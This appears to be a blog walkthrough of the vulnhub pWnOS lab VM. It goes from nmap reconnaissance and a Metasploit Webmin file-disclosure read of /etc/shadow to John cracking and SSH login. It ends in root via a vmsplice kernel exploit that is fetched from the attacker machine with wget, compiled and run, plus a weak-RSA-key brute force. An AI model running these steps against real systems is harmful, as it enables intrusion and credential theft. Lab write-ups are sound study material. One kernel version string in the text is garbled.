You can easily download image for this VM from vulnhub.
The walk through will be in detail. Let’s start with this machine.
I have already hosted this virtual machine in my vmware workstation. You will prompt with below image once you start pWnOS machine whether in vmware workstation or in virtual machine.
I have already logged into my Kali machine. Its time to get the IP address of pWnOS machine by a command utility prebuilt in Kali i.e. netdiscover as seen below:
Knowing about the services running on target machine helps to build an attack surface. We use Nmap; a command-line utility to find services running on various ports on target system.
Various ports are open, we see that MiniServ 0.01 (Webmin httpd) server is running on port 10000, after googling I found that the target system is using vulnerable version. Luckily I found an exploit in Metasploit.
Using the highlighted auxiliary module.
We see RPATH variable is set to /etc/passwd by default, let’s extract it:
Now set the RPATH variable to /etc/shadow and extract it too:
We got 5 hashes from shadow file, save the hashes in shadow.txt file as shown in command below.
John the ripper; a command-line utility will help to crack them using the following command:
john --wordlist=/usr/share/wordlists/rockyou.txt --fork=5 shadow.txt
Luckily, John cracked 1 hash out of 5.
This cracked hash helped us to login via SSH as shown below:
Let’s see what rights/privileges vmware (user) have:
As we saw vmware got no rights/privileges, we further investigate about the kernel.
After googling we found the following exploit for vulnerable version of kernel, you can easily find it in Kali via searchsploit.
Linux Kernel 2.6.17 < 18.104.22.168 - 'vmsplice' Local Privilege Escalation (2)
I have started apache2 web server on my kali machine to host this exploit publicly by the following command:
service apache2 start
Copy the exploit to web server.
cp /usr/share/exploitdb/exploits/linux/local/5092.c /var/www/html/
Now download the exploit in victim machine via limited shell and then compile the C program via gcc compiler which is pre-installed in Linux.
wget http://192.168.10.8/5092.c gcc 5092.c -o exploit ./exploit
Hurray we got into root 😉
There is another method too. As we came across /etc/passwd, we saw that there were few users mentioned at the very end. Each user can login to pWnOS via SSH. Each user has authorized keys that are present in root directory but in a hidden directory .ssh, let’s get it via RPATH variable.
You might be thinking why we are interested in searching for authorized keys. Well, in this scenario we are lucky enough to have file disclosure vulnerability and we do have access to authorized keys file placed in home directory of each user. Each authorized key is mapped to RSA key.
Now from where to get RSA keys? Good question 😀 Google solved this problem too. Below link has a repository of keys both for 1024 and 2048 bits. But here we need 2048 bits of RSA keys.
Below command will download the set of RSA keys. I have already downloaded into my Kali machine.
Now extract the file with the following command:
tar vxjf 5622.tar.bz2
Its time for brute forcing (to find the combination of authorized keys and RSA keys).
cd rsa grep -lr authorized_key
We got it, now login via SSH and run the local Privilege Escalation exploit as we did in Ist method.
ssh -i 2048/d8629ce6dc8f2492e1454c13f46adb26-4566 [email protected]
Hurray we got into root again 😀
If you are interested in reading configuration of SSH Key-Based Authentication on a Linux Server, do read my blog post here.
Thanks for stopping by here, if you like this blog post do leave a comment below.
Based Blockchain Network